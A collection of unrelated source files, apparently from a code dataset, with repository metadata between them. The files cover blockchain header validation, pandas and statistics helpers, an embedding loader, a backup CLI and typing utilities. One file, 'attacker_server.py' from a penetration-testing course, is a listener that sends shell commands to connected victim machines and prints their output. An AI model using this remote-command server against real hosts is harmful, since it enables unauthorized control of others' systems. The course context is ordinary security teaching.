log.error(f"{header_block.reward_chain_block.challenge_chain_ip_vdf }. expected {expected}")
log.error(f"Block: {header_block}")
return None, ValidationError(Err.INVALID_CC_IP_VDF)
if (
not header_block.challenge_chain_ip_proof.normalized_to_identity
and not header_block.challenge_chain_ip_proof.is_valid(
constants,
cc_vdf_output,
cc_target_vdf_info,
None,
)
):
log.error(f"Did not validate, output {cc_vdf_output}")
log.error(f"Block: {header_block}")
return None, ValidationError(Err.INVALID_CC_IP_VDF)
if (
header_block.challenge_chain_ip_proof.normalized_to_identity
and not header_block.challenge_chain_ip_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
header_block.reward_chain_block.challenge_chain_ip_vdf,
)
):
return None, ValidationError(Err.INVALID_CC_IP_VDF)
# 30. Check reward chain infusion point VDF
rc_target_vdf_info = VDFInfo(
rc_vdf_challenge,
ip_vdf_iters,
header_block.reward_chain_block.reward_chain_ip_vdf.output,
)
if not header_block.reward_chain_ip_proof.is_valid(
constants,
ClassgroupElement.get_default_element(),
header_block.reward_chain_block.reward_chain_ip_vdf,
rc_target_vdf_info,
):
return None, ValidationError(Err.INVALID_RC_IP_VDF)
# 31. Check infused challenge chain infusion point VDF
if not genesis_block:
overflow = is_overflow_block(constants, header_block.reward_chain_block.signage_point_index)
deficit = calculate_deficit(
constants,
header_block.height,
prev_b,
overflow,
len(header_block.finished_sub_slots),
)
if header_block.reward_chain_block.infused_challenge_chain_ip_vdf is None:
# If we don't have an ICC chain, deficit must be 4 or 5
if deficit < constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1:
return None, ValidationError(Err.INVALID_ICC_VDF)
else:
assert header_block.infused_challenge_chain_ip_proof is not None
# If we have an ICC chain, deficit must be 0, 1, 2 or 3
if deficit >= constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1:
return (
None,
ValidationError(
Err.INVALID_ICC_VDF,
f"icc vdf and deficit is bigger or equal to {constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1}",
),
)
if new_sub_slot:
last_ss = header_block.finished_sub_slots[-1]
assert last_ss.infused_challenge_chain is not None
icc_vdf_challenge: bytes32 = last_ss.infused_challenge_chain.get_hash()
icc_vdf_input: Optional[ClassgroupElement] = ClassgroupElement.get_default_element()
else:
assert prev_b is not None
if prev_b.is_challenge_block(constants):
icc_vdf_input = ClassgroupElement.get_default_element()
else:
icc_vdf_input = prev_b.infused_challenge_vdf_output
curr = prev_b
while curr.finished_infused_challenge_slot_hashes is None and not curr.is_challenge_block(constants):
curr = blocks.block_record(curr.prev_hash)
if curr.is_challenge_block(constants):
icc_vdf_challenge = curr.challenge_block_info_hash
else:
assert curr.finished_infused_challenge_slot_hashes is not None
icc_vdf_challenge = curr.finished_infused_challenge_slot_hashes[-1]
icc_target_vdf_info = VDFInfo(
icc_vdf_challenge,
ip_vdf_iters,
header_block.reward_chain_block.infused_challenge_chain_ip_vdf.output,
)
if icc_vdf_input is None or not header_block.infused_challenge_chain_ip_proof.is_valid(
constants,
icc_vdf_input,
header_block.reward_chain_block.infused_challenge_chain_ip_vdf,
icc_target_vdf_info,
):
return None, ValidationError(Err.INVALID_ICC_VDF, "invalid icc proof")
else:
if header_block.infused_challenge_chain_ip_proof is not None:
return None, ValidationError(Err.INVALID_ICC_VDF)
# 32. Check reward block hash
if header_block.foliage.reward_block_hash != header_block.reward_chain_block.get_hash():
return None, ValidationError(Err.INVALID_REWARD_BLOCK_HASH)
# 33. Check reward block is_transaction_block
if (
header_block.foliage.foliage_transaction_block_hash is not None
) != header_block.reward_chain_block.is_transaction_block:
return None, ValidationError(Err.INVALID_FOLIAGE_BLOCK_PRESENCE)
return required_iters, None
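# Hedged usage sketch (not part of this file): a caller that already has consensus
# `constants`, a BlockchainInterface `blocks`, and the expected difficulty /
# sub-slot iters from the difficulty-adjustment code could validate a received
# header block roughly like this:
#
#   required_iters, err = validate_finished_header_block(
#       constants, blocks, header_block, check_filter=True,
#       expected_difficulty=difficulty, expected_sub_slot_iters=sub_slot_iters,
#   )
#   if err is not None:
#       ...  # reject the block; err wraps the specific Err code
#   else:
#       ...  # required_iters feeds calculate_ip_iters for the block's infusion point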
| 47.81391
| 120
| 0.639521
|
ac5ee8b234d3426c2dcef6f03615ff75e3083dd8
| 1,408
|
py
|
Python
|
my_lambdata/my_mod.py
|
KristineYW/lambdata-kristine
|
3ace36fb1abdd9caaa86385fba9d06b6faba546a
|
[
"MIT"
] | null | null | null |
my_lambdata/my_mod.py
|
KristineYW/lambdata-kristine
|
3ace36fb1abdd9caaa86385fba9d06b6faba546a
|
[
"MIT"
] | null | null | null |
my_lambdata/my_mod.py
|
KristineYW/lambdata-kristine
|
3ace36fb1abdd9caaa86385fba9d06b6faba546a
|
[
"MIT"
] | 1
|
2020-06-02T23:44:10.000Z
|
2020-06-02T23:44:10.000Z
|
# my_lambdata/my_mod.py
from sklearn.model_selection import train_test_split
import pandas as pd
def enlarge(n):
"""
Param n is a number
Function will enlarge the number
"""
return n * 100
# Split a dataframe into train, val, and test sets
def df_split(df, target):
train1, val = train_test_split(
df, train_size=0.85, test_size=0.15, stratify=df[target], random_state=42)
    train2, test = train_test_split(
        train1, train_size=0.8, test_size=0.2, stratify=train1[target], random_state=42)
    return train2, val, test
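# Hedged usage sketch for df_split (the dataframe and column names below are made
# up). With train_size=0.85 and then 0.8, the pieces come out to roughly 68% train,
# 15% validation and 17% test of the original rows, stratified on the target column.
def _df_split_example():
    example_df = pd.DataFrame({'feature': range(100), 'label': [0, 1] * 50})
    train, val, test = df_split(example_df, target='label')
    return len(train), len(val), len(test)  # (68, 15, 17)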
# Assign datetime datatype to a column and then split into year, month,
# and day columns
def date_split(df, column):
df[column] = pd.to_datetime(df[column], infer_datetime_format=True)
new_df = df.copy()
    new_df['year'] = new_df[column].dt.year
    new_df['month'] = new_df[column].dt.month
    new_df['day'] = new_df[column].dt.day
    new_df = new_df.drop(columns=column)
    return new_df
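# Hedged usage sketch for date_split (column name and dates are made up): the
# returned frame keeps the other columns, gains year/month/day columns, and the
# original datetime column is dropped.
def _date_split_example():
    example_df = pd.DataFrame({'posted': ['2020-01-15', '2021-02-20'], 'value': [1, 2]})
    return date_split(example_df, 'posted')  # columns: value, year, month, day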
# this code breaks our ability to import enlarge from other files, if left
# in the global scope:
if __name__ == "__main__":
# # only run the code below IF this script is invoked from the command-line
# # not if it is imported from another script
print("HELLO")
y = int(input("Please choose a number: "))
print(y, enlarge(y))
| 30.608696
| 84
| 0.693892
|
7a876b0f344d9ea7c80390421c5db695701e6a46
| 6,266
|
py
|
Python
|
dsfs/statistics/stats_base.py
|
Infi-Knight/data_science_from_scratch
|
a78317728f218d4259fab925112413ddddfc30ca
|
[
"MIT"
] | null | null | null |
dsfs/statistics/stats_base.py
|
Infi-Knight/data_science_from_scratch
|
a78317728f218d4259fab925112413ddddfc30ca
|
[
"MIT"
] | null | null | null |
dsfs/statistics/stats_base.py
|
Infi-Knight/data_science_from_scratch
|
a78317728f218d4259fab925112413ddddfc30ca
|
[
"MIT"
] | null | null | null |
from dsfs.linear_algebra.vectors import sum_of_squares, dot
from collections import Counter
import math
import matplotlib.pyplot as plt
num_friends = [100, 49, 41, 40, 25, 21, 21, 19, 19, 18, 18, 16, 15, 15, 15, 15, 14, 14, 13, 13, 13, 13, 12, 12, 11, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 6, 6, 6, 6, 6, 6, 6,
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
def make_friend_counts_histogram():
friend_counts = Counter(num_friends)
xs = range(101)
ys = [friend_counts[x] for x in xs]
plt.bar(xs, ys)
plt.axis([0, 101, 0, 25])
plt.title("Histogram of Friend Counts")
plt.xlabel("# of friends")
plt.ylabel("# of people")
plt.show()
num_points = len(num_friends) # 204
largest_value = max(num_friends) # 100
smallest_value = min(num_friends) # 1
sorted_values = sorted(num_friends)
smallest_value = sorted_values[0] # 1
second_smallest_value = sorted_values[1] # 1
second_largest_value = sorted_values[-2] # 49
# note: in Python 2 this would need "from __future__ import division"; in Python 3, / is already true division
def mean(x):
return sum(x) / len(x)
def median(v):
"""finds the 'middle-most' value of v"""
n = len(v)
sorted_v = sorted(v)
midpoint = n // 2
if n % 2 == 1:
# if odd, return the middle value
return sorted_v[midpoint]
else:
# if even, return the average of the middle values
lo = midpoint - 1
hi = midpoint
return (sorted_v[lo] + sorted_v[hi]) / 2
def quantile(x, p):
"""returns the pth-percentile value in x"""
p_index = int(p * len(x))
return sorted(x)[p_index]
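# Worked example (sketch): median interpolates for even-length data, while
# quantile just indexes into the sorted list, so the two can disagree.
def _central_tendency_example():
    xs = [1, 2, 3, 4]
    assert median(xs) == 2.5       # average of the two middle values
    assert quantile(xs, 0.5) == 3  # p_index = int(0.5 * 4) = 2 -> sorted(xs)[2]
    return median(xs), quantile(xs, 0.5)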
def mode(x):
"""returns a list, might be more than one mode"""
counts = Counter(x)
max_count = max(counts.values())
return [x_i for x_i, count in counts.items()
if count == max_count]
# "range" already means something in Python, so we'll use a different name
def data_range(x):
return max(x) - min(x)
def de_mean(x):
"""translate x by subtracting its mean (so the result has mean 0)"""
x_bar = mean(x)
return [x_i - x_bar for x_i in x]
def variance(x):
"""assumes x has at least two elements"""
n = len(x)
deviations = de_mean(x)
return sum_of_squares(deviations) / (n - 1)
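# Worked example (sketch): variance above is the *sample* variance (divides by
# n - 1). For xs = [2, 4, 4, 4, 5, 5, 7, 9], mean(xs) == 5 and the squared
# deviations sum to 32, so variance(xs) == 32 / 7 (about 4.571) rather than the
# population value 32 / 8 == 4.0.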
def standard_deviation(x):
return math.sqrt(variance(x))
def interquartile_range(x):
return quantile(x, 0.75) - quantile(x, 0.25)
####
#
# CORRELATION
#
#####
daily_minutes = [1, 68.77, 51.25, 52.08, 38.36, 44.54, 57.13, 51.4, 41.42, 31.22, 34.76, 54.01, 38.79, 47.59, 49.1, 27.66, 41.03, 36.73, 48.65, 28.12, 46.62, 35.57, 32.98, 35, 26.07, 23.77, 39.73, 40.57, 31.65, 31.21, 36.32, 20.45, 21.93, 26.02, 27.34, 23.49, 46.94, 30.5, 33.8, 24.23, 21.4, 27.94, 32.24, 40.57, 25.07, 19.42, 22.39, 18.42, 46.96, 23.72, 26.41, 26.97, 36.76, 40.32, 35.02, 29.47, 30.2, 31, 38.11, 38.18, 36.31, 21.03, 30.86, 36.07, 28.66, 29.08, 37.28, 15.28, 24.17, 22.31, 30.17, 25.53, 19.85, 35.37, 44.6, 17.23, 13.47, 26.33, 35.02, 32.09, 24.81, 19.33, 28.77, 24.26, 31.98, 25.73, 24.86, 16.28, 34.51, 15.23, 39.72, 40.8, 26.06, 35.76, 34.76, 16.13, 44.04, 18.03, 19.65, 32.62,
35.59, 39.43, 14.18, 35.24, 40.13, 41.82, 35.45, 36.07, 43.67, 24.61, 20.9, 21.9, 18.79, 27.61, 27.21, 26.61, 29.77, 20.59, 27.53, 13.82, 33.2, 25, 33.1, 36.65, 18.63, 14.87, 22.2, 36.81, 25.53, 24.62, 26.25, 18.21, 28.08, 19.42, 29.79, 32.8, 35.99, 28.32, 27.79, 35.88, 29.06, 36.28, 14.1, 36.63, 37.49, 26.9, 18.58, 38.48, 24.48, 18.95, 33.55, 14.24, 29.04, 32.51, 25.63, 22.22, 19, 32.73, 15.16, 13.9, 27.2, 32.01, 29.27, 33, 13.74, 20.42, 27.32, 18.23, 35.35, 28.48, 9.08, 24.62, 20.12, 35.26, 19.92, 31.02, 16.49, 12.16, 30.7, 31.22, 34.65, 13.13, 27.51, 33.2, 31.57, 14.1, 33.42, 17.44, 10.12, 24.42, 9.82, 23.39, 30.93, 15.03, 21.67, 31.09, 33.29, 22.61, 26.89, 23.48, 8.38, 27.81, 32.35, 23.84]
def covariance(x, y):
n = len(x)
return dot(de_mean(x), de_mean(y)) / (n - 1)
def correlation(x, y):
stdev_x = standard_deviation(x)
stdev_y = standard_deviation(y)
if stdev_x > 0 and stdev_y > 0:
return covariance(x, y) / stdev_x / stdev_y
else:
return 0 # if no variation, correlation is zero
outlier = num_friends.index(100) # index of outlier
num_friends_good = [x
for i, x in enumerate(num_friends)
if i != outlier]
daily_minutes_good = [x
for i, x in enumerate(daily_minutes)
if i != outlier]
if __name__ == "__main__":
print("num_points", len(num_friends))
print("largest value", max(num_friends))
print("smallest value", min(num_friends))
print("second_smallest_value", sorted_values[1])
print("second_largest_value", sorted_values[-2])
print("mean(num_friends)", mean(num_friends))
print("median(num_friends)", median(num_friends))
print("quantile(num_friends, 0.10)", quantile(num_friends, 0.10))
print("quantile(num_friends, 0.25)", quantile(num_friends, 0.25))
print("quantile(num_friends, 0.75)", quantile(num_friends, 0.75))
print("quantile(num_friends, 0.90)", quantile(num_friends, 0.90))
print("mode(num_friends)", mode(num_friends))
print("data_range(num_friends)", data_range(num_friends))
print("variance(num_friends)", variance(num_friends))
print("standard_deviation(num_friends)", standard_deviation(num_friends))
print("interquartile_range(num_friends)", interquartile_range(num_friends))
print("covariance(num_friends, daily_minutes)",
covariance(num_friends, daily_minutes))
print("correlation(num_friends, daily_minutes)",
correlation(num_friends, daily_minutes))
print("correlation(num_friends_good, daily_minutes_good)",
correlation(num_friends_good, daily_minutes_good))
| 40.166667
| 719
| 0.600543
|
bd0ff62b257fa147518e8e037082629c867e80e6
| 4,684
|
py
|
Python
|
word_embedder/embedders/keyed_vectors.py
|
Yoctol/word-embedder
|
0b4a0afc4c5f9a2af596a3ada060a2360a51579e
|
[
"MIT"
] | 3
|
2019-04-29T21:59:49.000Z
|
2020-04-01T15:34:21.000Z
|
word_embedder/embedders/keyed_vectors.py
|
Yoctol/word-embedder
|
0b4a0afc4c5f9a2af596a3ada060a2360a51579e
|
[
"MIT"
] | 2
|
2018-09-17T05:48:52.000Z
|
2018-09-19T04:26:46.000Z
|
word_embedder/embedders/keyed_vectors.py
|
Yoctol/word-embedder
|
0b4a0afc4c5f9a2af596a3ada060a2360a51579e
|
[
"MIT"
] | 2
|
2019-06-03T02:19:00.000Z
|
2020-09-23T15:29:15.000Z
|
import io
import warnings
from os.path import isfile, basename
import os
from typing import List
import numpy as np
from .base import Embedder
from .oov_error import OOVError
from .utils import download_data, extract_gz
def _load_text_file(path: str):
fin = io.open(
path, 'r',
encoding='utf-8',
newline='\n',
errors='ignore',
)
vocab_size, embedding_size = map(int, fin.readline().split())
vocab_list = ['0'] * vocab_size
word_vectors = np.random.rand(
vocab_size, embedding_size).astype(np.float32)
for idx, line in enumerate(fin):
tokens = line.rstrip().split(' ')
vocab_list[idx] = tokens[0]
vector = list(map(float, tokens[1:]))
word_vectors[idx, :] = np.array(vector).astype(np.float32)
fin.close()
return embedding_size, vocab_size, vocab_list, word_vectors
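# Sketch of the text layout _load_text_file expects (the words and values are
# made up): a header line "<vocab_size> <embedding_size>", then one
# whitespace-separated line per word:
#
#   2 3
#   apple 0.1 0.2 0.3
#   banana 0.4 0.5 0.6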
def _load_bin_file(path: str):
# load .bin file
# Note that float in this file should be float32
# float64 is not allowed
fin = open(path, 'rb')
header = fin.readline().decode('utf8')
vocab_size, embedding_size = (int(x) for x in header.split())
# init vocab list
vocab_list = ['0'] * vocab_size
word_vectors = np.random.rand(
vocab_size, embedding_size).astype(np.float32)
binary_len = 4 * embedding_size # float32
for idx in range(vocab_size):
# mixed text and binary: read text first, then binary
word = []
while True:
ch = fin.read(1)
if ch == b' ':
break
if ch == b'':
raise EOFError(
"unexpected end of input; is count incorrect or file otherwise damaged?")
# ignore newlines in front of words (some binary files have)
if ch != b'\n':
word.append(ch)
vocab_list[idx] = b''.join(word).decode('utf8')
word_vectors[idx, :] = np.frombuffer(
fin.read(binary_len),
dtype='float32',
)
fin.close()
return embedding_size, vocab_size, vocab_list, word_vectors
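# Minimal sketch of a writer that produces the layout _load_bin_file expects
# (the words and values are made up): the same "<vocab_size> <embedding_size>"
# header line, then for every word its utf-8 bytes, a single space, and
# embedding_size native-endian float32 values.
def _write_example_bin(path: str):
    vectors = {'apple': [0.1, 0.2, 0.3], 'banana': [0.4, 0.5, 0.6]}
    with open(path, 'wb') as fout:
        fout.write(('%d %d\n' % (len(vectors), 3)).encode('utf8'))
        for word, vector in vectors.items():
            fout.write(word.encode('utf8') + b' ')
            fout.write(np.asarray(vector, dtype=np.float32).tobytes())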
class KeyedVectors(Embedder):
def __init__(self, path: str, binary: bool = False):
self._path = path
self._binary = binary
self._is_built = False
def build(self):
if not self._is_built:
if not isfile(self._path):
# if data is not at self._path
# download it through url in .env
download_data(
url=os.getenv(basename(self._path)),
output_path=self._path + '.gz',
)
extract_gz(self._path + '.gz')
(
self._embedding_size,
self._vocab_size,
self._vocab_list,
self._word_vectors,
) = self._load_data(
path=self._path,
binary=self._binary,
)
self._is_built = True
def __getitem__(self, key) -> np.ndarray:
"""Get a word vector
If key is an int, return vector by index.
If key is a string, return vector by word.
"""
if isinstance(key, str):
index = self.get_index(word=key)
elif isinstance(key, int):
index = key
else:
raise TypeError(
'Only support int and str type of input',
)
vector = self._get_vector(index)
return vector
@property
def n_vocab(self) -> int:
"""Vocabulary size"""
return self._vocab_size
@property
def n_dim(self) -> int:
"""Embedding size"""
return self._embedding_size
@property
def vocab(self) -> List[str]:
return self._vocab_list
def get_index(self, word: str) -> int:
try:
index = self._vocab_list.index(word)
except ValueError:
index = -1
return index
def get_word(self, index: int) -> str:
word = None
try:
word = self._vocab_list[index]
except IndexError:
warnings.warn(
f"index [{index}] out of range (max vocab size = {self._vocab_size})",
RuntimeWarning,
)
return word
def _get_vector(self, index: int) -> np.ndarray:
if (index >= 0) and (index < self._vocab_size):
return self._word_vectors[index, :]
else:
raise OOVError
@staticmethod
def _load_data(path: str, binary: bool = False):
if binary:
return _load_bin_file(path=path)
else:
return _load_text_file(path=path)
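# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example, assuming a small word2vec-style text file already exists
# at the hypothetical path below (first line "<vocab_size> <embedding_size>",
# then one "<word> <float> <float> ..." line per word). It only exercises the
# surface shown above: build(), __getitem__, get_index(), n_vocab and n_dim.
if __name__ == '__main__':
    embedder = KeyedVectors(path='/tmp/example_vectors.txt', binary=False)
    embedder.build()                       # loads (or downloads) the vectors lazily
    print(embedder.n_vocab, embedder.n_dim)
    first_word = embedder.vocab[0]
    print(embedder.get_index(first_word))  # 0
    print(embedder[first_word].shape)      # str key -> lookup by word
    print(embedder[0].shape)               # int key -> lookup by row index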
| 28.736196
| 93
| 0.554868
|
bd51b134a8f2523e200140f66f26e661b1632915
| 2,080
|
py
|
Python
|
dotbak/controllers/base.py
|
datafolklabs/dotbak
|
c2d63a8f2c5d36d4e57a98f55602cd32a8f846ad
|
[
"BSD-3-Clause"
] | 2
|
2021-01-18T01:46:29.000Z
|
2021-10-06T01:57:06.000Z
|
dotbak/controllers/base.py
|
datafolklabs/dotbak
|
c2d63a8f2c5d36d4e57a98f55602cd32a8f846ad
|
[
"BSD-3-Clause"
] | 2
|
2021-09-30T19:53:53.000Z
|
2021-12-18T19:45:05.000Z
|
dotbak/controllers/base.py
|
datafolklabs/dotbak
|
c2d63a8f2c5d36d4e57a98f55602cd32a8f846ad
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from datetime import datetime
from cement import Controller, ex
from cement.utils import fs
from cement.utils.version import get_version_banner
from ..core.version import get_version
from ..core import exc
VERSION_BANNER = """
Lazily Backup Files and Directories %s
%s
""" % (get_version(), get_version_banner())
class Base(Controller):
class Meta:
label = 'base'
# text displayed at the top of --help output
description = 'Lazily Backup Files and Directories'
# text displayed at the bottom of --help output
epilog = 'Usage: dotbak /path/to/file'
# controller level arguments. ex: 'dotbak --version'
arguments = [
### add a version banner
( [ '-v', '--version' ],
{ 'action' : 'version',
'version' : VERSION_BANNER } ),
( [ '-s', '--suffix' ],
{ 'action' : 'store',
'dest' : 'suffix' ,
'help' : 'backup file/dir suffix (extension)' } ),
( [ 'path' ],
{ 'action' : 'store',
'help' : 'path to file/dir to backup' } ),
]
    def _clean_path(self, path):
        # strip any trailing path separators from the supplied path
        RSTRIP = ['/', '\\']
        for char in RSTRIP:
            path = path.rstrip(char)
        res = fs.abspath(path)
        return res
def _default(self):
"""Default action if no sub-command is passed."""
path = self._clean_path(self.app.pargs.path)
if self.app.pargs.suffix is not None:
suffix = self.app.pargs.suffix
else:
suffix = self.app.config.get('dotbak', 'suffix')
if self.app.config.get('dotbak', 'timestamps') is True:
timestamp = datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
suffix = f'{suffix}-{timestamp}'
if not os.path.exists(self.app.pargs.path):
raise exc.DotBakError(f'Path does not exist: {path}')
res = fs.backup(path, suffix=suffix)
self.app.log.info(f'Copied {path} -> {res}')
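# --- Illustrative sketch (not part of dotbak) ---
# A standalone, hedged approximation of how _default() above assembles the
# backup suffix when the (assumed) 'timestamps' config option is enabled.
# It uses only the standard library; the real command delegates the actual
# copy and final naming to cement.utils.fs.backup().
def example_backup_suffix(base_suffix: str = 'bak', timestamps: bool = True) -> str:
    from datetime import datetime
    suffix = base_suffix
    if timestamps:
        suffix = f"{suffix}-{datetime.now().strftime('%Y-%m-%d-%H:%M:%S')}"
    return suffix
# e.g. example_backup_suffix('bak') -> 'bak-<YYYY-MM-DD-HH:MM:SS>'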
| 30.144928
| 69
| 0.546154
|
cc9f7c4abd96b899e296760c9132c78e77a3a2a3
| 1,358
|
py
|
Python
|
006 - Simple Netcat Replacement/attacker_server.py
|
Danziger/Pluralsight-Network-Penetration-Testing-Using-Python-and-Kali-Linux
|
040acfb55470f97a3a1c6e6d392cd0cdfc84eff8
|
[
"MIT"
] | 5
|
2017-11-12T12:53:28.000Z
|
2020-11-02T06:16:45.000Z
|
006 - Simple Netcat Replacement/attacker_server.py
|
cyborix/Pluralsight-Network-Penetration-Testing-Using-Python-and-Kali-Linux
|
5bcbc41889c6bd65aaad312b9b429dc189b8d0d1
|
[
"MIT"
] | null | null | null |
006 - Simple Netcat Replacement/attacker_server.py
|
cyborix/Pluralsight-Network-Penetration-Testing-Using-Python-and-Kali-Linux
|
5bcbc41889c6bd65aaad312b9b429dc189b8d0d1
|
[
"MIT"
] | 6
|
2016-06-20T00:27:31.000Z
|
2019-02-14T14:28:45.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import socket
import argparse
import threading
clients = {}
def client_serve(client):
try:
print 'Enter a command to execute: '
command = sys.stdin.read()
client.send(command)
while True:
# Wait for data from listener
print client.recv(4096)
# Wait for more input
command = raw_input('')
command += '\n'
client.send(command)
except:
print 'Client closed the connection'
pass
def server_listen(port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(('0.0.0.0', port))
listener.listen(25) # Max. clients
print 'Server listening on port %s...' % port
while True:
client, addr = listener.accept()
print 'Incoming connection from %s:%d' % (addr[0], addr[1])
clients[addr[0]] = client
client_serve_thread = threading.Thread(target=client_serve, args=(client,))
client_serve_thread.start()
def main():
parser = argparse.ArgumentParser('Attacker\'s Listening Server')
    parser.add_argument('-p', '--port', type=int, help='The port number to listen on', default=9999)
args = parser.parse_args()
server_listen(args.port)
if __name__ == '__main__':
main()
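# --- Illustrative counterpart sketch (not part of the original script) ---
# A minimal nc-style client that could connect to the server above: it prints
# whatever the server sends and relays typed replies back. Host/port defaults
# are hypothetical; written in Python 2 style to match this file. Nothing
# below runs automatically - call example_client() explicitly.
def example_client(host='127.0.0.1', port=9999):
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((host, port))
    try:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            print data.rstrip()
            reply = raw_input('> ') + '\n'
            conn.send(reply)
    finally:
        conn.close()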
| 22.633333
| 103
| 0.613402
|
f70e640ff57f2e199fac15fbee0fe2c1a0c1d44c
| 2,362
|
py
|
Python
|
src/api/infrastructure/utils/TypeChecker.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 14
|
2020-12-19T15:06:13.000Z
|
2022-01-12T19:52:17.000Z
|
src/process/infrastructure/utils/TypeChecker.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 43
|
2021-01-06T22:05:22.000Z
|
2022-03-10T10:30:30.000Z
|
src/api/infrastructure/utils/TypeChecker.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 4
|
2020-12-18T23:10:09.000Z
|
2021-04-02T13:03:12.000Z
|
import inspect
import typing
from abc import ABC
import builtins
def get_builtins():
return list(filter(lambda x: not x.startswith('_'), dir(builtins)))
class ITypeChecker(ABC):
def is_class(self, obj):
if inspect.isclass(obj) and not self.is_primitive(obj):
return True
return False
def is_primitive(self, obj):
builtins_list = list(filter(lambda x: not x.startswith('_'), dir(builtins)))
return obj.__name__ in builtins_list
def is_generic(self, class_type):
pass
def is_base_generic(self, class_type):
pass
# python 3.7
if hasattr(typing, '_GenericAlias'):
class TypeChecker(ITypeChecker):
def is_generic(self, class_type):
return self._is_generic(class_type)
def is_base_generic(self, class_type):
return self._is_base_generic(class_type)
def _is_generic(self, cls):
if isinstance(cls, typing._GenericAlias):
return True
if isinstance(cls, typing._SpecialForm):
return cls not in {typing.Any}
return False
def _is_base_generic(self, cls):
if isinstance(cls, typing._GenericAlias):
if cls.__origin__ in {typing.Generic, typing._Protocol}:
return False
if isinstance(cls, typing._VariadicGenericAlias):
return True
return len(cls.__parameters__) > 0
if isinstance(cls, typing._SpecialForm):
return cls._name in {'ClassVar', 'Union', 'Optional'}
return False
elif hasattr(typing, '_Union'):
class TypeChecker(ITypeChecker):
# python 3.6
def is_generic(self, class_type):
return self._is_generic(class_type)
def is_base_generic(self, class_type):
return self._is_base_generic(class_type)
def _is_generic(self, cls):
if isinstance(cls, (typing.GenericMeta, typing._Union, typing._Optional, typing._ClassVar)):
return True
return False
def _is_base_generic(self, cls):
if isinstance(cls, (typing.GenericMeta, typing._Union)):
return cls.__args__ in {None, ()}
if isinstance(cls, typing._Optional):
return True
return False
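# --- Illustrative usage sketch (not part of the original module) ---
# A small demo of the version-specific TypeChecker selected above, assuming a
# Python version where one of the branches applies (e.g. 3.6-3.8):
# parameterised generics such as List[int] count as "generic", the bare List
# (with an unbound type parameter) also counts as a "base generic", and a
# plain class such as int is neither.
if __name__ == '__main__':
    from typing import List
    checker = TypeChecker()
    print(checker.is_generic(List[int]))       # expected: True
    print(checker.is_base_generic(List[int]))  # expected: False
    print(checker.is_base_generic(List))       # expected: True
    print(checker.is_generic(int))             # expected: False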
| 31.493333
| 104
| 0.6105
|
547791321adae390e0e905b7d7ad1108b3118ad2
| 10,939
|
py
|
Python
|
testscripts/RDKB/component/WIFIHAL/TS_WIFIHAL_StartOrStopHostApd.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/WIFIHAL/TS_WIFIHAL_StartOrStopHostApd.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/WIFIHAL/TS_WIFIHAL_StartOrStopHostApd.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2020 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version='1.0' encoding='utf-8'?>
<xml>
<id></id>
<!-- Do not edit id. This will be auto filled while exporting. If you are adding a new script keep the id empty -->
<version>10</version>
<!-- Do not edit version. This will be auto incremented while updating. If you are adding a new script you can keep the version as 1 -->
<name>TS_WIFIHAL_StartOrStopHostApd</name>
<!-- If you are adding a new script you can specify the script name. Script Name should be unique same as this file name with out .py extension -->
<primitive_test_id> </primitive_test_id>
<!-- Do not change primitive_test_id if you are editing an existing script. -->
<primitive_test_name>WIFIHAL_StartorStopHostApd</primitive_test_name>
<!-- -->
<primitive_test_version>1</primitive_test_version>
<!-- -->
<status>FREE</status>
<!-- -->
<synopsis>To start or stop Host Apd using wifi_startHostApd() and wifi_stopHostApd() and validate the same using wifi_getApStatus() api.</synopsis>
<!-- -->
<groups_id />
<!-- -->
<execution_time>5</execution_time>
<!-- -->
<long_duration>false</long_duration>
